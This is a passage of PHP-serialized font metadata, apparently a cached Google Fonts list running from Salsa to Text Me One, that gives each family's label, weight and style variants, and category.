One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:5:\"Salsa\";a:3:{s:5:\"label\";s:5:\"Salsa\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Sanchez\";a:3:{s:5:\"label\";s:7:\"Sanchez\";s:8:\"variants\";a:2:{i:0;s:6:\"italic\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:8:\"Sancreek\";a:3:{s:5:\"label\";s:8:\"Sancreek\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Sansita\";a:3:{s:5:\"label\";s:7:\"Sansita\";s:8:\"variants\";a:8:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:3:\"800\";i:3;s:9:\"800italic\";i:4;s:3:\"900\";i:5;s:9:\"900italic\";i:6;s:6:\"italic\";i:7;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:15:\"Sansita Swashed\";a:3:{s:5:\"label\";s:15:\"Sansita Swashed\";s:8:\"variants\";a:7:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:3:\"800\";i:5;s:3:\"900\";i:6;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Sarabun\";a:3:{s:5:\"label\";s:7:\"Sarabun\";s:8:\"variants\";a:16:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:6:\"italic\";i:15;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Sarala\";a:3:{s:5:\"label\";s:6:\"Sarala\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Sarina\";a:3:{s:5:\"label\";s:6:\"Sarina\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:8:\"Sarpanch\";a:3:{s:5:\"label\";s:8:\"Sarpanch\";s:8:\"variants\";a:6:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:3:\"800\";i:4;s:3:\"900\";i:5;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Sassy Frass\";a:3:{s:5:\"label\";s:11:\"Sassy Frass\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:7:\"Satisfy\";a:3:{s:5:\"label\";s:7:\"Satisfy\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:15:\"Sawarabi Gothic\";a:3:{s:5:\"label\";s:15:\"Sawarabi Gothic\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:15:\"Sawarabi Mincho\";a:3:{s:5:\"label\";s:15:\"Sawarabi Mincho\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"Scada\";a:3:{s:5:\"label\";s:5:\"Scada\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:16:\"Scheherazade New\";a:3:{s:5:\"label\";s:16:\"Scheherazade New\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:10:\"Schoolbell\";a:3:{s:5:\"label\";s:10:\"Schoolbell\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:9:\"Scope One\";a:3:{s:5:\"label\";s:9:\"Scope One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:14:\"Seaweed Script\";a:3:{s:5:\"label\";s:14:\"Seaweed Script\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"Secular One\";a:3:{s:5:\"label\";s:11:\"Secular One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"Sedgwick Ave\";a:3:{s:5:\"label\";s:12:\"Sedgwick Ave\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:20:\"Sedgwick Ave Display\";a:3:{s:5:\"label\";s:20:\"Sedgwick Ave Display\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:3:\"Sen\";a:3:{s:5:\"label\";s:3:\"Sen\";s:8:\"variants\";a:3:{i:0;s:3:\"700\";i:1;s:3:\"800\";i:2;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Sevillana\";a:3:{s:5:\"label\";s:9:\"Sevillana\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"Seymour One\";a:3:{s:5:\"label\";s:11:\"Seymour One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:18:\"Shadows Into Light\";a:3:{s:5:\"label\";s:18:\"Shadows Into Light\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:22:\"Shadows Into Light Two\";a:3:{s:5:\"label\";s:22:\"Shadows Into Light Two\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:8:\"Shalimar\";a:3:{s:5:\"label\";s:8:\"Shalimar\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:6:\"Shanti\";a:3:{s:5:\"label\";s:6:\"Shanti\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"Share\";a:3:{s:5:\"label\";s:5:\"Share\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Share Tech\";a:3:{s:5:\"label\";s:10:\"Share Tech\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:15:\"Share Tech Mono\";a:3:{s:5:\"label\";s:15:\"Share Tech Mono\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:9:\"monospace\";}s:16:\"Shippori Antique\";a:3:{s:5:\"label\";s:16:\"Shippori Antique\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:19:\"Shippori Antique B1\";a:3:{s:5:\"label\";s:19:\"Shippori Antique B1\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:15:\"Shippori Mincho\";a:3:{s:5:\"label\";s:15:\"Shippori Mincho\";s:8:\"variants\";a:5:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:3:\"800\";i:4;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:18:\"Shippori Mincho B1\";a:3:{s:5:\"label\";s:18:\"Shippori Mincho B1\";s:8:\"variants\";a:5:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:3:\"800\";i:4;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:7:\"Shizuru\";a:3:{s:5:\"label\";s:7:\"Shizuru\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Shojumaru\";a:3:{s:5:\"label\";s:9:\"Shojumaru\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"Short Stack\";a:3:{s:5:\"label\";s:11:\"Short Stack\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:9:\"Shrikhand\";a:3:{s:5:\"label\";s:9:\"Shrikhand\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:8:\"Siemreap\";a:3:{s:5:\"label\";s:8:\"Siemreap\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Sigmar One\";a:3:{s:5:\"label\";s:10:\"Sigmar One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Signika\";a:3:{s:5:\"label\";s:7:\"Signika\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:16:\"Signika Negative\";a:3:{s:5:\"label\";s:16:\"Signika Negative\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Simonetta\";a:3:{s:5:\"label\";s:9:\"Simonetta\";s:8:\"variants\";a:4:{i:0;s:3:\"900\";i:1;s:9:\"900italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Single Day\";a:3:{s:5:\"label\";s:10:\"Single Day\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Sintony\";a:3:{s:5:\"label\";s:7:\"Sintony\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:13:\"Sirin Stencil\";a:3:{s:5:\"label\";s:13:\"Sirin Stencil\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:8:\"Six Caps\";a:3:{s:5:\"label\";s:8:\"Six Caps\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"Skranji\";a:3:{s:5:\"label\";s:7:\"Skranji\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Slabo 13px\";a:3:{s:5:\"label\";s:10:\"Slabo 13px\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:10:\"Slabo 27px\";a:3:{s:5:\"label\";s:10:\"Slabo 27px\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:7:\"Slackey\";a:3:{s:5:\"label\";s:7:\"Slackey\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Smokum\";a:3:{s:5:\"label\";s:6:\"Smokum\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Smooch\";a:3:{s:5:\"label\";s:6:\"Smooch\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:6:\"Smythe\";a:3:{s:5:\"label\";s:6:\"Smythe\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Sniglet\";a:3:{s:5:\"label\";s:7:\"Sniglet\";s:8:\"variants\";a:2:{i:0;s:3:\"800\";i:1;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Snippet\";a:3:{s:5:\"label\";s:7:\"Snippet\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:13:\"Snowburst One\";a:3:{s:5:\"label\";s:13:\"Snowburst One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Sofadi One\";a:3:{s:5:\"label\";s:10:\"Sofadi One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:5:\"Sofia\";a:3:{s:5:\"label\";s:5:\"Sofia\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:6:\"Solway\";a:3:{s:5:\"label\";s:6:\"Solway\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"700\";i:3;s:3:\"800\";i:4;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:10:\"Song Myung\";a:3:{s:5:\"label\";s:10:\"Song Myung\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:10:\"Sonsie One\";a:3:{s:5:\"label\";s:10:\"Sonsie One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:4:\"Sora\";a:3:{s:5:\"label\";s:4:\"Sora\";s:8:\"variants\";a:8:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:16:\"Sorts Mill Goudy\";a:3:{s:5:\"label\";s:16:\"Sorts Mill Goudy\";s:8:\"variants\";a:2:{i:0;s:6:\"italic\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:15:\"Source Code Pro\";a:3:{s:5:\"label\";s:15:\"Source Code Pro\";s:8:\"variants\";a:16:{i:0;s:3:\"200\";i:1;s:9:\"200italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:3:\"500\";i:5;s:9:\"500italic\";i:6;s:3:\"600\";i:7;s:9:\"600italic\";i:8;s:3:\"700\";i:9;s:9:\"700italic\";i:10;s:3:\"800\";i:11;s:9:\"800italic\";i:12;s:3:\"900\";i:13;s:9:\"900italic\";i:14;s:6:\"italic\";i:15;s:7:\"regular\";}s:8:\"category\";s:9:\"monospace\";}s:13:\"Source Sans 3\";a:3:{s:5:\"label\";s:13:\"Source Sans 3\";s:8:\"variants\";a:16:{i:0;s:3:\"200\";i:1;s:9:\"200italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:3:\"500\";i:5;s:9:\"500italic\";i:6;s:3:\"600\";i:7;s:9:\"600italic\";i:8;s:3:\"700\";i:9;s:9:\"700italic\";i:10;s:3:\"800\";i:11;s:9:\"800italic\";i:12;s:3:\"900\";i:13;s:9:\"900italic\";i:14;s:6:\"italic\";i:15;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:15:\"Source Sans Pro\";a:3:{s:5:\"label\";s:15:\"Source Sans Pro\";s:8:\"variants\";a:12:{i:0;s:3:\"200\";i:1;s:9:\"200italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:3:\"600\";i:5;s:9:\"600italic\";i:6;s:3:\"700\";i:7;s:9:\"700italic\";i:8;s:3:\"900\";i:9;s:9:\"900italic\";i:10;s:6:\"italic\";i:11;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:14:\"Source Serif 4\";a:3:{s:5:\"label\";s:14:\"Source Serif 4\";s:8:\"variants\";a:16:{i:0;s:3:\"200\";i:1;s:9:\"200italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:3:\"500\";i:5;s:9:\"500italic\";i:6;s:3:\"600\";i:7;s:9:\"600italic\";i:8;s:3:\"700\";i:9;s:9:\"700italic\";i:10;s:3:\"800\";i:11;s:9:\"800italic\";i:12;s:3:\"900\";i:13;s:9:\"900italic\";i:14;s:6:\"italic\";i:15;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:16:\"Source Serif Pro\";a:3:{s:5:\"label\";s:16:\"Source Serif Pro\";s:8:\"variants\";a:12:{i:0;s:3:\"200\";i:1;s:9:\"200italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:3:\"600\";i:5;s:9:\"600italic\";i:6;s:3:\"700\";i:7;s:9:\"700italic\";i:8;s:3:\"900\";i:9;s:9:\"900italic\";i:10;s:6:\"italic\";i:11;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:13:\"Space Grotesk\";a:3:{s:5:\"label\";s:13:\"Space Grotesk\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:10:\"Space Mono\";a:3:{s:5:\"label\";s:10:\"Space Mono\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:9:\"monospace\";}s:7:\"Spartan\";a:3:{s:5:\"label\";s:7:\"Spartan\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:13:\"Special Elite\";a:3:{s:5:\"label\";s:13:\"Special Elite\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:8:\"Spectral\";a:3:{s:5:\"label\";s:8:\"Spectral\";s:8:\"variants\";a:14:{i:0;s:3:\"200\";i:1;s:9:\"200italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:3:\"500\";i:5;s:9:\"500italic\";i:6;s:3:\"600\";i:7;s:9:\"600italic\";i:8;s:3:\"700\";i:9;s:9:\"700italic\";i:10;s:3:\"800\";i:11;s:9:\"800italic\";i:12;s:6:\"italic\";i:13;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:11:\"Spectral SC\";a:3:{s:5:\"label\";s:11:\"Spectral SC\";s:8:\"variants\";a:14:{i:0;s:3:\"200\";i:1;s:9:\"200italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:3:\"500\";i:5;s:9:\"500italic\";i:6;s:3:\"600\";i:7;s:9:\"600italic\";i:8;s:3:\"700\";i:9;s:9:\"700italic\";i:10;s:3:\"800\";i:11;s:9:\"800italic\";i:12;s:6:\"italic\";i:13;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:10:\"Spicy Rice\";a:3:{s:5:\"label\";s:10:\"Spicy Rice\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Spinnaker\";a:3:{s:5:\"label\";s:9:\"Spinnaker\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Spirax\";a:3:{s:5:\"label\";s:6:\"Spirax\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"Spline Sans\";a:3:{s:5:\"label\";s:11:\"Spline Sans\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:10:\"Squada One\";a:3:{s:5:\"label\";s:10:\"Squada One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:20:\"Sree Krushnadevaraya\";a:3:{s:5:\"label\";s:20:\"Sree Krushnadevaraya\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:8:\"Sriracha\";a:3:{s:5:\"label\";s:8:\"Sriracha\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:8:\"Srisakdi\";a:3:{s:5:\"label\";s:8:\"Srisakdi\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"Staatliches\";a:3:{s:5:\"label\";s:11:\"Staatliches\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Stalemate\";a:3:{s:5:\"label\";s:9:\"Stalemate\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:13:\"Stalinist One\";a:3:{s:5:\"label\";s:13:\"Stalinist One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:15:\"Stardos Stencil\";a:3:{s:5:\"label\";s:15:\"Stardos Stencil\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:5:\"Stick\";a:3:{s:5:\"label\";s:5:\"Stick\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:14:\"Stick No Bills\";a:3:{s:5:\"label\";s:14:\"Stick No Bills\";s:8:\"variants\";a:7:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:3:\"800\";i:6;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:21:\"Stint Ultra Condensed\";a:3:{s:5:\"label\";s:21:\"Stint Ultra Condensed\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:20:\"Stint Ultra Expanded\";a:3:{s:5:\"label\";s:20:\"Stint Ultra Expanded\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:5:\"Stoke\";a:3:{s:5:\"label\";s:5:\"Stoke\";s:8:\"variants\";a:2:{i:0;s:3:\"300\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:6:\"Strait\";a:3:{s:5:\"label\";s:6:\"Strait\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"Style Script\";a:3:{s:5:\"label\";s:12:\"Style Script\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:7:\"Stylish\";a:3:{s:5:\"label\";s:7:\"Stylish\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:19:\"Sue Ellen Francisco\";a:3:{s:5:\"label\";s:19:\"Sue Ellen Francisco\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:8:\"Suez One\";a:3:{s:5:\"label\";s:8:\"Suez One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:13:\"Sulphur Point\";a:3:{s:5:\"label\";s:13:\"Sulphur Point\";s:8:\"variants\";a:3:{i:0;s:3:\"300\";i:1;s:3:\"700\";i:2;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Sumana\";a:3:{s:5:\"label\";s:6:\"Sumana\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:9:\"Sunflower\";a:3:{s:5:\"label\";s:9:\"Sunflower\";s:8:\"variants\";a:3:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"700\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Sunshiney\";a:3:{s:5:\"label\";s:9:\"Sunshiney\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:16:\"Supermercado One\";a:3:{s:5:\"label\";s:16:\"Supermercado One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:4:\"Sura\";a:3:{s:5:\"label\";s:4:\"Sura\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:7:\"Suranna\";a:3:{s:5:\"label\";s:7:\"Suranna\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:9:\"Suravaram\";a:3:{s:5:\"label\";s:9:\"Suravaram\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:11:\"Suwannaphum\";a:3:{s:5:\"label\";s:11:\"Suwannaphum\";s:8:\"variants\";a:5:{i:0;s:3:\"100\";i:1;s:3:\"300\";i:2;s:3:\"700\";i:3;s:3:\"900\";i:4;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:18:\"Swanky and Moo Moo\";a:3:{s:5:\"label\";s:18:\"Swanky and Moo Moo\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:9:\"Syncopate\";a:3:{s:5:\"label\";s:9:\"Syncopate\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:4:\"Syne\";a:3:{s:5:\"label\";s:4:\"Syne\";s:8:\"variants\";a:5:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:3:\"800\";i:4;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Syne Mono\";a:3:{s:5:\"label\";s:9:\"Syne Mono\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:9:\"monospace\";}s:12:\"Syne Tactile\";a:3:{s:5:\"label\";s:12:\"Syne Tactile\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Tajawal\";a:3:{s:5:\"label\";s:7:\"Tajawal\";s:8:\"variants\";a:7:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"700\";i:4;s:3:\"800\";i:5;s:3:\"900\";i:6;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Tangerine\";a:3:{s:5:\"label\";s:9:\"Tangerine\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:6:\"Taprom\";a:3:{s:5:\"label\";s:6:\"Taprom\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:5:\"Tauri\";a:3:{s:5:\"label\";s:5:\"Tauri\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"Taviraj\";a:3:{s:5:\"label\";s:7:\"Taviraj\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:4:\"Teko\";a:3:{s:5:\"label\";s:4:\"Teko\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"Telex\";a:3:{s:5:\"label\";s:5:\"Telex\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:18:\"Tenali Ramakrishna\";a:3:{s:5:\"label\";s:18:\"Tenali Ramakrishna\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:10:\"Tenor Sans\";a:3:{s:5:\"label\";s:10:\"Tenor Sans\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Text Me One\";a:3:{s:5:\"label\";s:11:\"Text Me 